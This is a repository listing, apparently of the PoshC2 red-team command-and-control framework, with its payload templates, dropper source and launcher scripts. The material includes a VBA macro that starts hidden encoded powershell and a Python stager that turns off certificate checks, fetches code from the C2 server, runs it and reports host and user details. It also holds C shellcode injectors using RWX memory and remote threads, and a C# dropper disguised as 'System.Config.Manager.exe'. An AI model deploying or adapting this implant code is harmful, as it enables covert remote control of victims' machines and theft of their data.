exec = exec + "o"
exec = exec + "w"
exec = exec + "e"
exec = exec + "r"
exec = exec + "s"
exec = exec + "h"
exec = exec + "e"
exec = exec + "l"
exec = exec + "l"
exec = exec + "."
exec = exec + "e"
exec = exec + "x"
exec = exec + "e"
exec = exec + " -exec bypass -Noninteractive -windowstyle hidden -e " & str

Shell(exec)
End Sub
--------------------------------------------------------------------------------
/resources/payload-templates/dropper.py:
--------------------------------------------------------------------------------
# Python stager: fetches a first stage from the C2 over HTTPS, verifies it,
# exec()s it, then checks in and exec()s what comes back. All #REPLACE...#
# tokens are substituted at payload-generation time. Written to run on both
# Python 2 and 3, hence the bare try/except fallbacks throughout.
import os,sys,base64,ssl,socket,pwd,hashlib,time
try:import urllib.request as urllib2
except:import urllib2
# Kill date (YYYY-MM-DD): the stager refuses to run on or after it.
kdn=time.strptime("#REPLACEKILLDATE#","%Y-%m-%d")
# Expected SHA-512 of the first stage and a marker string it must contain.
pyhash="#REPLACEPYTHONHASH#"
pykey="#REPLACESPYTHONKEY#"
# Shared key for encrypt()/decrypt() of the check-in cookie and the responses.
key="#REPLACEKEY#"
serverclean=[#REPLACEHOSTPORT#]
urlid="#REPLACEURLID#"
url=serverclean[0]+"#REPLACEQUICKCOMMAND#"
url2=serverclean[0]+"#REPLACECONNECTURL#"
# Optional domain-fronting Host header; only used when hh[0] is truthy.
hh=[#REPLACEDOMAINFRONT#]
ua="#REPLACEUSERAGENT#"
# Today's UTC date, rounded to a date-only struct_time so it compares with kdn.
cstr=time.strftime("%Y-%m-%d",time.gmtime());cstr=time.strptime(cstr,"%Y-%m-%d")
# This doesn't exist in python < 2.7.9
# NOTE(review): this disables TLS certificate verification for every urllib
# HTTPS request made by this process (self-signed C2 certificates). Integrity
# of the first stage therefore rests solely on the pyhash/pykey check below;
# the later check-in responses rely only on the shared-key decrypt().
if sys.version_info[0] == 3 or (sys.version_info[0] == 2 and sys.version_info[1] >= 7 and sys.version_info[2] >= 9):
    ssl._create_default_https_context=ssl._create_unverified_context
if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})
else: r=urllib2.Request(url,headers={'User-agent':ua})
res=urllib2.urlopen(r);d=res.read();
# The first byte of the response is dropped; the rest is hex-encoded stage
# source. Python 3 path first, Python 2 (str.decode("hex")) on failure.
try:b=bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8");s=hashlib.sha512(b.encode("utf-8")).hexdigest()
except:c=d[1:];b=c.decode("hex");s=hashlib.sha512(b).hexdigest()
# Run the stage only if it carries the marker, hashes to the embedded value,
# and the kill date has not been reached; otherwise exit quietly.
if pykey in b and pyhash == s and cstr < kdn:
    try:exec(bytes.fromhex(d[1:].decode("utf-8")).decode("utf-8"))
    except:exec(b)
else: sys.exit(0)
# encrypt()/decrypt() are not defined in this file; they are expected to be
# provided by the stage exec()'d above - TODO confirm against the server side.
# First check-in: environment string is encrypted into the SessionID cookie.
un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();pname="NA"
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))
if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")})
else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode("utf-8")})
request = urllib2.Request(url2, headers=headers);response = urllib2.urlopen(request);
# Response is decrypted with the shared key and exec()'d - no hash check here.
html = response.read().decode('utf-8');x=decrypt(key, html)
exec(base64.b64decode(x))
# Second check-in, same shape but reporting procname "python"; the decrypted
# body is stripped of trailing NULs (zero padding left by the server's
# CBC/Zeros encryption) before decoding.
un=pwd.getpwuid(os.getuid())[ 0 ];pid=os.getpid();procname="python"
is64=sys.maxsize > 2**32;arch=('x64' if is64 == True else 'x86')
hn=socket.gethostname();o=urllib2.build_opener()
encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))
if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})
else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})
res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\0');
exec(base64.b64decode(x))
--------------------------------------------------------------------------------
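/resources/payload-templates/dropper.xor:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdlib.h>

#REPLACEME#

/*
 * In-place XOR of cipher[0..cipher_len) with a repeating key.
 *
 * The previous version also wrote a terminating 0 at cipher[cipher_len],
 * which is one byte past the buffer it is called with (sizeof(sc)) - an
 * out-of-bounds write. Nothing reads sc as a C string, so the terminator is
 * dropped rather than the buffer grown.
 *
 * NOTE(review): if #REPLACE_XOR_KEY# declares `key` as a string literal,
 * sizeof(key) includes the trailing NUL, so every sizeof(key)-th byte of sc
 * is XORed with 0 and left as-is. Confirm the generated declaration.
 */
void XOR(char* cipher, size_t cipher_len, char* key, size_t key_len) {
    for (size_t x = 0; x < cipher_len; x++)
    {
        cipher[x] ^= key[x % key_len];
    }
}

void migrate(DWORD);


/*
 * Entry point: decodes the XOR-obfuscated shellcode `sc` with `key` (both
 * emitted at payload-generation time), injects it into this process and
 * then parks the main thread forever.
 */
int main(int argc, char *argv[])
{
    int processID = GetCurrentProcessId();

    #REPLACE_XOR_KEY#
    XOR((char*)sc, sizeof(sc), key, sizeof(key));

    migrate(processID);
    while(1) {Sleep(50000);}
    return 0;
}


/*
 * Allocates a RW region in process dwProcessID, flips it to RWX, copies the
 * decoded `sc` in and starts a thread on it. Allocating RW and changing the
 * protection afterwards (rather than one RWX allocation call) is the choice
 * this template makes; the page still ends up RWX.
 *
 * VirtualProtect (not VirtualProtectEx) acts on our own address space, which
 * only works because dwProcessID is always the current PID here.
 * Failure paths exit the process, matching the rest of the file.
 */
void migrate(DWORD dwProcessID) {
    HANDLE hP;
    HANDLE hRT;
    PVOID pRB;

    DWORD opr = PAGE_READWRITE;
    BOOL vp;

    if(!dwProcessID) {
        exit(0);
    }
    hP = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if(!hP) {
        exit(0);
    }
    pRB = VirtualAllocEx(hP, NULL, sizeof(sc), MEM_COMMIT, PAGE_READWRITE);
    if (!pRB) {
        exit(0);
    }
    vp = VirtualProtect(pRB, sizeof(sc), PAGE_EXECUTE_READWRITE, &opr);
    if (!vp) {
        /* Not executable: previously this silently returned and left the process idle. */
        CloseHandle(hP);
        exit(0);
    }
    if (!WriteProcessMemory(hP, pRB, sc, sizeof(sc), NULL)) {
        exit(0);
    }
    hRT = CreateRemoteThread(hP, NULL, 0, pRB, NULL, 0, NULL);
    if (!hRT) {
        exit(0);
    }
    /* The thread is never joined; release the handle instead of leaking it. */
    CloseHandle(hRT);
    CloseHandle(hP);
}
--------------------------------------------------------------------------------
/resources/payload-templates/dropper_cs.sct:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/resources/payload-templates/dropper_migrate.c: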
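--------------------------------------------------------------------------------
#define WINVER 0x0501

#include <windows.h>
#include <stdlib.h>

#REPLACEME#

void pump(DWORD);

/*
 * Entry point. With a positive numeric argv[1] the shellcode `sc` (emitted in
 * place of #REPLACEME#) is injected into that PID; otherwise a new
 * #REPLACEMEPROCESS# is spawned (hidden window) and injected instead.
 *
 * argv[1] is only read when it exists: the previous version called
 * atoi(argv[1]) unconditionally and dereferenced NULL when run without
 * arguments.
 */
int main(int argc, char *argv[])
{
    int x = (argc > 1) ? atoi(argv[1]) : 0;
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi= {0};
    /* CreateProcess may write to lpCommandLine; give it a writable buffer, not a literal. */
    char cmdline[] = "#REPLACEMEPROCESS#";
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    if (x > 0)
    {
        pump(x);
    } else {
        /* bInheritHandles = TRUE as in the original template. */
        if (CreateProcess(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
        {
            pump(GetProcessId(pi.hProcess));
            /* The child keeps running; we just stop holding handles to it. */
            CloseHandle(pi.hThread);
            CloseHandle(pi.hProcess);
        }
    }
    return 0;
}


/*
 * Allocates an RWX region in process dwProcessID, copies `sc` into it and
 * starts a remote thread at its first byte. Every failure path exits the
 * process, matching the rest of the file.
 *
 * NOTE(review): RWX allocation plus CreateRemoteThread into another process
 * is a well-known EDR indicator; kept because it is what this template does.
 */
void pump(DWORD dwProcessID) {
    HANDLE hProc;
    HANDLE hRemoteThread;
    PVOID pRemoteBuffer;

    if(!dwProcessID) {
        exit(0);
    }
    hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessID);
    if(!hProc) {
        exit(0);
    }
    /* sizeof(sc)*2: over-allocates to leave slack after the shellcode. */
    pRemoteBuffer = VirtualAllocEx(hProc, NULL, sizeof(sc)*2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!pRemoteBuffer) {
        exit(0);
    }
    if (!WriteProcessMemory(hProc, pRemoteBuffer, sc, sizeof(sc), NULL)) {
        exit(0);
    }
    hRemoteThread = CreateRemoteThread(hProc, NULL, 0, pRemoteBuffer, NULL, 0, NULL);
    if (!hRemoteThread) {
        exit(0);
    }
    /* The thread is never joined; release the handle instead of leaking it. */
    CloseHandle(hRemoteThread);
    CloseHandle(hProc);
}
--------------------------------------------------------------------------------
/resources/payload-templates/dropper_rg.sct:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 7 | 8 | 13 | 14 | 15 |
--------------------------------------------------------------------------------
/resources/payload-templates/msbuild.xml:
--------------------------------------------------------------------------------
1 | 2 | 3 | <#REPLACEMERANDSTRING# /> 4 | 5 | 9 | 10 | 11 | 31 | 32 | 33 | 34 | 35 |
--------------------------------------------------------------------------------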
/resources/payload-templates/sharp-dropper/Comms.cs:
--------------------------------------------------------------------------------
using System;

/// <summary>
/// Transport contract for the sharp dropper. Implementations are disposable
/// (they are expected to own a channel). The semantics are not visible here;
/// the names suggest GetCommands polls for tasking, SendTaskOutput* return a
/// task's result keyed by taskId, and Stage performs the initial check-in with
/// the environment string - confirm against the implementations.
/// </summary>
internal interface IComms : IDisposable
{
    string GetCommands();
    void SendTaskOutputString(string taskId, string data);
    void SendTaskOutputBytes(string taskId, byte[] data);
    string Stage(string environmentalInfo);
}
--------------------------------------------------------------------------------
/resources/payload-templates/sharp-dropper/ERROR_CODES.txt:
--------------------------------------------------------------------------------
0x0001: CommandLineToArgvW returned nullptr
0x0002: Unexpected beacon time unit (Expected s for seconds, m for minutes or h for hours)
0x0003: GetLoadedType error
0x0004: Decrypted primer response is null
0x0005: Every comms channel failed
0x0006: Invalid loadmodule string, expected two args separated by a space
0x0007: Module run but not loaded
0x0008: Split config string has invalid length
0x0009: RunTempAppDomain Sleeve function is null
0x0010: RunTempAppDomain Ace function is null
0x0011: RunTempAppDomain invocation errored
0x0012: FComm could not resolve directory for file
0x0013: FComm could not create FComm file
--------------------------------------------------------------------------------
/resources/payload-templates/sharp-dropper/Encryption.cs:
--------------------------------------------------------------------------------
using System;
using System.Security.Cryptography;
using System.Text;

/// <summary>
/// AES-256-CBC helpers shared with the server side. Wire format of every
/// ciphertext: base64( IV (16 bytes) || CBC body ). See CreateAlgorithm for the
/// mode and padding choices and their caveats.
/// </summary>
internal static class Encryption
{
    /// <summary>UTF-8 encodes <paramref name="plaintext"/> and defers to the byte[] overload.</summary>
    internal static string Encrypt(string key, string plaintext, bool gzip = false)
    {
        return Encrypt(key, Encoding.UTF8.GetBytes(plaintext), gzip);
    }

    /// <summary>
    /// Encrypts <paramref name="plaintext"/> under the base64 <paramref name="key"/>,
    /// gzip-compressing it first via Utils.Compress when <paramref name="gzip"/> is set.
    /// Returns base64(IV || ciphertext) with a fresh IV per call.
    /// </summary>
    internal static string Encrypt(string key, byte[] plaintext, bool gzip = false)
    {
        if (gzip)
            plaintext = Utils.Compress(plaintext);

        try
        {
var algorithm = CreateAlgorithm(key, null); 20 | var cipherText = algorithm.CreateEncryptor().TransformFinalBlock(plaintext, 0, plaintext.Length); 21 | return Convert.ToBase64String(Utils.Combine(algorithm.IV, cipherText)); 22 | } 23 | catch 24 | { 25 | var cipher = CreateAlgorithm(key, null, false); 26 | var cipherText = cipher.CreateEncryptor().TransformFinalBlock(plaintext, 0, plaintext.Length); 27 | return Convert.ToBase64String(Utils.Combine(cipher.IV, cipherText)); 28 | } 29 | } 30 | 31 | private static byte[] Decrypt(string key, byte[] ciphertext) 32 | { 33 | var iv = new byte[16]; 34 | Array.Copy(ciphertext, iv, 16); 35 | try 36 | { 37 | var cipher = CreateAlgorithm(key, Convert.ToBase64String(iv)); 38 | return cipher.CreateDecryptor().TransformFinalBlock(ciphertext, 16, ciphertext.Length - 16); 39 | } 40 | catch 41 | { 42 | var cipher = CreateAlgorithm(key, Convert.ToBase64String(iv), false); 43 | return cipher.CreateDecryptor().TransformFinalBlock(ciphertext, 16, ciphertext.Length - 16); 44 | } 45 | finally 46 | { 47 | Array.Clear(ciphertext, 0, ciphertext.Length); 48 | Array.Clear(iv, 0, 16); 49 | } 50 | } 51 | 52 | internal static byte[] Decrypt(string key, string base64EncodedCiphertext) 53 | { 54 | var ciphertext = Convert.FromBase64String(base64EncodedCiphertext); 55 | return Decrypt(key, ciphertext); 56 | } 57 | 58 | private static SymmetricAlgorithm CreateAlgorithm(string key, string iv, bool useRijndael = true) 59 | { 60 | SymmetricAlgorithm algorithm; 61 | if (useRijndael) 62 | algorithm = new RijndaelManaged(); 63 | else 64 | algorithm = new AesCryptoServiceProvider(); 65 | 66 | algorithm.Mode = CipherMode.CBC; 67 | algorithm.Padding = PaddingMode.Zeros; 68 | algorithm.BlockSize = 128; 69 | algorithm.KeySize = 256; 70 | 71 | if (null != iv) 72 | algorithm.IV = Convert.FromBase64String(iv); 73 | else 74 | algorithm.GenerateIV(); 75 | 76 | if (null != key) 77 | algorithm.Key = Convert.FromBase64String(key); 78 | 79 | return algorithm; 80 | } 81 | 
} -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Internals.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | internal static class Internals 5 | { 6 | internal const int PAGE_EXECUTE_READWRITE = 0x40; 7 | 8 | [DllImport("kernel32.dll")] 9 | internal static extern IntPtr GetCurrentThread(); 10 | 11 | [DllImport("kernel32.dll")] 12 | internal static extern bool TerminateThread(IntPtr hThread, uint dwExitCode); 13 | 14 | [DllImport("kernel32.dll")] 15 | internal static extern IntPtr GetConsoleWindow(); 16 | 17 | [DllImport("shell32.dll")] 18 | internal static extern IntPtr CommandLineToArgvW([MarshalAs(UnmanagedType.LPWStr)] string lpCmdLine, out int pNumArgs); 19 | 20 | [DllImport("user32.dll")] 21 | internal static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); 22 | 23 | [DllImport("kernel32.dll", SetLastError = true)] 24 | internal static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 27 | internal delegate void CallBack( 28 | [MarshalAs(UnmanagedType.LPWStr)] string appDomainName, 29 | [MarshalAs(UnmanagedType.LPArray)] byte[] data, 30 | int len, 31 | [MarshalAs(UnmanagedType.LPArray)] byte[] echoAssembly, 32 | int echoAssemblyLength, 33 | [MarshalAs(UnmanagedType.LPWStr)] string className, 34 | [MarshalAs(UnmanagedType.LPWStr)] string entryPoint, 35 | int argsLength, 36 | [MarshalAs(UnmanagedType.LPWStr)] string argsString, 37 | out int output, 38 | out IntPtr outputStringIntPtr); 39 | } -------------------------------------------------------------------------------- /resources/payload-templates/sharp-dropper/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using 
System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("System.Config.Manager.exe")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Config Manager")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("D04EC694-31D4-4075-9E29-1650D6477AD3")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/resources/payload-templates/sharp-dropper/README.md:
--------------------------------------------------------------------------------
# Sharp Dropper

This project is the C# Dropper. It can be opened as a solution for ease of development, but note that Posh does not build the solution: it only uses `mingw` to build `Program.cs`, so changes to the project/solution files affect development only.


## Error codes

The project uses error codes instead of messages; the codes and their meanings are listed in ERROR_CODES.txt.

## Config

The config has the format:

```
RetriesEnabled;RetryLimit;StageWaitTime;DomainCheck;ProxyUrl;ProxyUser;ProxyPass;UserAgent;HttpReferrer;KillDate;UrlId;FailoverDomain1,FailoverHostHeader1:FailoverDomain2,FailoverHostHeader2;BeaconDomain1,BeaconHostHeader1:BeaconDomain2,BeaconHostHeader2;/url/1:/url/2;RandomUri;StageUrl;Images;Sleep;Jitter;Key
```

Fields are separated by `;`, entries within the domain and URL lists by `:`, and a domain from its host header by `,`, so a field value (notably `ProxyPass`) cannot itself contain any of these characters; a string that does not split into the expected number of fields is what error 0x0008 (`Split config string has invalid length`) in ERROR_CODES.txt reports. The string includes the `Key` and any proxy credentials, so generated payloads and filled-in examples should be handled as secrets.

E.g.:

```
true;10;30;BLOREBANK;;;;Base64EncodedUserAgent;;2022-10-10;1;https://blorebank.com:8080,asdf.azureedge.net-https://test.blorebank.com,asdf2.azureedge.net;http://beacon.blorebank.com,;/test1:/test2:/test3;image1,image2;randomuri;/stage;30;0.6;key
```

(In this example the two failover entries are separated by `-`, whereas the format line above uses `:`; one of the two is presumably out of date — confirm against the dropper's config parser before relying on either.)
--------------------------------------------------------------------------------
/resources/payload-templates/sharp-dropper/sharp_dropper.csproj:
--------------------------------------------------------------------------------
(XML element tags were not rendered in this listing; the surviving element text follows)
Debug
AnyCPU
{D04EC694-31D4-4075-9E29-1650D6477AD3}
Exe
Properties
System.Config.Manager
v4.5.1
512
AnyCPU
true
full
false
bin\Debug\
DEBUG;TRACE;PBIND;HTTP;FCOMM
prompt
4
AnyCPU
pdbonly
true
bin\Release\
TRACE;HTTP
prompt
4
--------------------------------------------------------------------------------
/resources/payload-templates/sharp-dropper/sharp_dropper.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sharp_dropper", "sharp_dropper.csproj", "{D04EC694-31D4-4075-9E29-1650D6477AD3}"
EndProject
Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug|Any CPU = Debug|Any CPU 8 | Release|Any CPU = Release|Any CPU 9 | EndGlobalSection 10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 11 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 12 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Debug|Any CPU.Build.0 = Debug|Any CPU 13 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Release|Any CPU.ActiveCfg = Release|Any CPU 14 | {D04EC694-31D4-4075-9E29-1650D6477AD3}.Release|Any CPU.Build.0 = Release|Any CPU 15 | EndGlobalSection 16 | EndGlobal 17 | -------------------------------------------------------------------------------- /resources/payload-templates/stage2core.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/payload-templates/stage2core.so -------------------------------------------------------------------------------- /resources/responses/200_response1.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | #RANDOMDATA# 9 | 10 | -------------------------------------------------------------------------------- /resources/responses/200_response2.html: -------------------------------------------------------------------------------- 1 | 2 | Welcome 3 | #RANDOMDATA# 4 |
5 |
6 | 7 | -------------------------------------------------------------------------------- /resources/responses/200_response3.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | #RANDOMDATA# 7 |
8 | -------------------------------------------------------------------------------- /resources/responses/200_response4.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | #RANDOMDATA# 4 | Jani 5 | #RANDOMDATA# 6 | Microsoft.XML.Parser 7 | -------------------------------------------------------------------------------- /resources/responses/200_response5.html: -------------------------------------------------------------------------------- 1 | 2 | #RANDOMDATA# 3 |
#RANDOMDATA#
4 | 17 | 18 | -------------------------------------------------------------------------------- /resources/responses/200_response6.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Bloodroot 5 | Sanguinaria canadensis 6 | 4 7 | Mostly Shady 8 | $2.44 9 | #RANDOMDATA# 10 | 11 | 12 | Columbine 13 | Aquilegia canadensis 14 | 3 15 | Mostly Shady 16 | $9.37 17 | #RANDOMDATA# 18 | 19 | 20 | Marsh Marigold 21 | Caltha palustris 22 | 4 23 | Mostly Sunny 24 | $6.81 25 | #RANDOMDATA# 26 | 27 | 28 | Cowslip 29 | Caltha palustris 30 | 4 31 | Mostly Shady 32 | $9.90 33 | #RANDOMDATA# 34 | 35 | -------------------------------------------------------------------------------- /resources/responses/404_response.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 5 |

Not Found

6 |

The requested URL was not found on this server.

7 |
8 |
IIS ASP.NET 2.0.43451 Server
9 | 10 | -------------------------------------------------------------------------------- /resources/scripts/_posh-common: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | check_if_mac(){ 4 | if [ "$(uname)" == "Darwin" ]; then 5 | IS_MAC=true 6 | else 7 | IS_MAC=false 8 | fi 9 | } 10 | 11 | get_posh_projects_dir(){ 12 | check_if_mac 13 | if [ "$IS_MAC" = true ]; then 14 | POSH_PROJECTS_DIR="/private/var/poshc2" 15 | else 16 | POSH_PROJECTS_DIR="/var/poshc2" 17 | fi 18 | } 19 | 20 | get_docker_posh_projects_dir(){ 21 | DOCKER_POSH_PROJECTS_DIR="/var/poshc2" 22 | } 23 | 24 | get_posh_dir() { 25 | check_if_mac 26 | if [ "$IS_MAC" = true ]; then 27 | SCRIPT_LOCATION=`readlink -n $0` 28 | if [ -z "$SCRIPT_LOCATION" ]; then 29 | echo "In Docker install, using POSHC2_INSTALL_DIR environment variable for PoshC2 installation directory" 30 | echo "This is only required if developing with Docker." 31 | POSH_DIR="$POSHC2_INSTALL_DIR" 32 | if [ -z "$POSH_DIR" ]; then 33 | echo "POSHC2_INSTALL_DIR environment variable not set, defaulting to /opt/PoshC2" 34 | POSH_DIR="/opt/PoshC2" 35 | else 36 | echo "POSH_DIR set to $POSH_DIR" 37 | return 38 | fi 39 | fi 40 | POSH_DIR="`dirname $SCRIPT_LOCATION`/../../" 41 | else 42 | SCRIPT_LOCATION=`readlink -f -n $0` 43 | POSH_DIR="`dirname $SCRIPT_LOCATION`/../../" 44 | fi 45 | } 46 | 47 | get_posh_project(){ 48 | get_posh_projects_dir 49 | POSH_PROJECT=`cat $POSH_PROJECTS_DIR/CURRENT_PROJECT 2>/dev/null` 50 | if [ -z "$POSH_PROJECT" ]; then 51 | echo "No PoshC2 project set, please run posh-project" 52 | exit 1 53 | fi 54 | } 55 | 56 | get_posh_project_dir(){ 57 | get_posh_projects_dir 58 | get_posh_project 59 | POSH_PROJECT_DIR="$POSH_PROJECTS_DIR/$POSH_PROJECT" 60 | if [ ! 
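-d "$POSH_PROJECT_DIR" ]; then
    echo "No PoshC2 project directory, please run posh-project"
    exit 1
  fi
}

get_docker_image_name(){
  DOCKER_IMAGE_NAME="m0rv4i/poshc2"
}
--------------------------------------------------------------------------------
/resources/scripts/fpc:
--------------------------------------------------------------------------------
#!/bin/bash
# fpc - run resources/scripts/fpc.py inside the PoshC2 pipenv against the
# current project's database. Any extra arguments are forwarded to fpc.py.

# trap ctrl-c and call ctrl_c()
trap ctrl_c INT

function ctrl_c() {
  popd > /dev/null
  exit
}

source /usr/local/bin/_posh-common
get_posh_dir
get_posh_project_dir

# Both values are the double-quoted YAML scalars from config.yml. The path is
# quoted so a project directory containing spaces still works.
CONFIG_FILE="$POSH_PROJECT_DIR/config.yml"
DATABASE_TYPE=$(grep "DatabaseType: " "$CONFIG_FILE" | cut -d "\"" -f 2)
DATABASE_STRING=$(grep "PostgresConnectionString: " "$CONFIG_FILE" | cut -d "\"" -f 2)

# NOTE(review): PostgresConnectionString (which may embed the database
# password) is handed to fpc.py as a command-line argument, so it is visible to
# every local user via ps / /proc/<pid>/cmdline while fpc.py runs. Passing it
# via the environment or a file would avoid that but needs a matching change in
# fpc.py, which is not part of this listing.
pushd "$POSH_DIR" >/dev/null

if [ "$?" -eq "0" ]; then
  # Fix: "$@" (was a bare $@) keeps forwarded arguments that contain spaces
  # or glob characters intact.
  python3 -m pipenv run python3 "resources/scripts/fpc.py" -p "$POSH_PROJECT_DIR" -d "$DATABASE_TYPE" -pg "$DATABASE_STRING" "$@"
  popd > /dev/null
fi
--------------------------------------------------------------------------------
/resources/scripts/posh:
--------------------------------------------------------------------------------
#!/bin/bash

# trap ctrl-c and call ctrl_c()
trap ctrl_c INT

function ctrl_c() {
  popd >/dev/null
  exit
}

source /usr/local/bin/_posh-common
get_posh_dir

pushd "$POSH_DIR" >/dev/null

if [ "$?" 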
-eq "0" ]; then 17 | sudo python3 -m pipenv run python3 start.py --client "$@" 18 | popd > /dev/null 19 | fi 20 | -------------------------------------------------------------------------------- /resources/scripts/posh-api-server: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | get_posh_project_dir 14 | 15 | pushd $POSH_DIR >/dev/null 16 | if [ "$?" -eq "0" ]; then 17 | 18 | sudo python3 -m pipenv run python3 -u start_api.py --server 2>&1 | sudo tee -a "$POSH_PROJECT_DIR/poshc2_api_server.log" 19 | popd > /dev/null 20 | fi 21 | -------------------------------------------------------------------------------- /resources/scripts/posh-config: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_project_dir 5 | 6 | if [[ "$EDITOR" != "" ]]; then 7 | sudo $EDITOR "$POSH_PROJECT_DIR/config.yml" 8 | elif [[ "$*" == *"--nano"* ]]; then 9 | sudo nano "$POSH_PROJECT_DIR/config.yml" 10 | else 11 | sudo vim "$POSH_PROJECT_DIR/config.yml" 12 | fi 13 | -------------------------------------------------------------------------------- /resources/scripts/posh-cookie-decrypter: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 | 14 | pushd $POSH_DIR >/dev/null 15 | if [ "$?" 
-eq "0" ]; then 16 | 17 | sudo python3 -m pipenv run python3 "$POSH_DIR/cookie_decrypter.py" 18 | popd > /dev/null 19 | 20 | fi 21 | 22 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | source /usr/local/bin/_posh-common 4 | get_posh_projects_dir 5 | get_docker_posh_projects_dir 6 | get_docker_image_name 7 | 8 | show_help(){ 9 | echo "*** PoshC2 Docker Implant Handler ***" 10 | echo "Usage:" 11 | echo "posh -t -u " 12 | echo "" 13 | echo "Default Docker tag is latest (master)" 14 | } 15 | 16 | DOCKER_TAG="latest" 17 | USER="" 18 | DEV="" 19 | 20 | while getopts "h?t:u:d" opt; do 21 | case "$opt" in 22 | h|\?) 23 | show_help 24 | exit 0 25 | ;; 26 | t) DOCKER_TAG="$OPTARG" 27 | ;; 28 | u) USER="$OPTARG" 29 | ;; 30 | d) DEV="-v /opt/PoshC2:/opt/PoshC2" 31 | ;; 32 | esac 33 | done 34 | 35 | if [ ! -z "$USER" ]; then 36 | sudo -E docker run -ti -l posh-client --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh -u "$USER" 37 | else 38 | sudo -E docker run -ti -l posh-client --rm -v "$POSH_PROJECTS_DIR:$DOCKER_POSH_PROJECTS_DIR" $DEV "$DOCKER_IMAGE_NAME":"$DOCKER_TAG" /usr/local/bin/posh 39 | fi 40 | -------------------------------------------------------------------------------- /resources/scripts/posh-docker-build: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # trap ctrl-c and call ctrl_c() 4 | trap ctrl_c INT 5 | 6 | function ctrl_c() { 7 | popd > /dev/null 8 | exit 9 | } 10 | 11 | source /usr/local/bin/_posh-common 12 | get_posh_dir 13 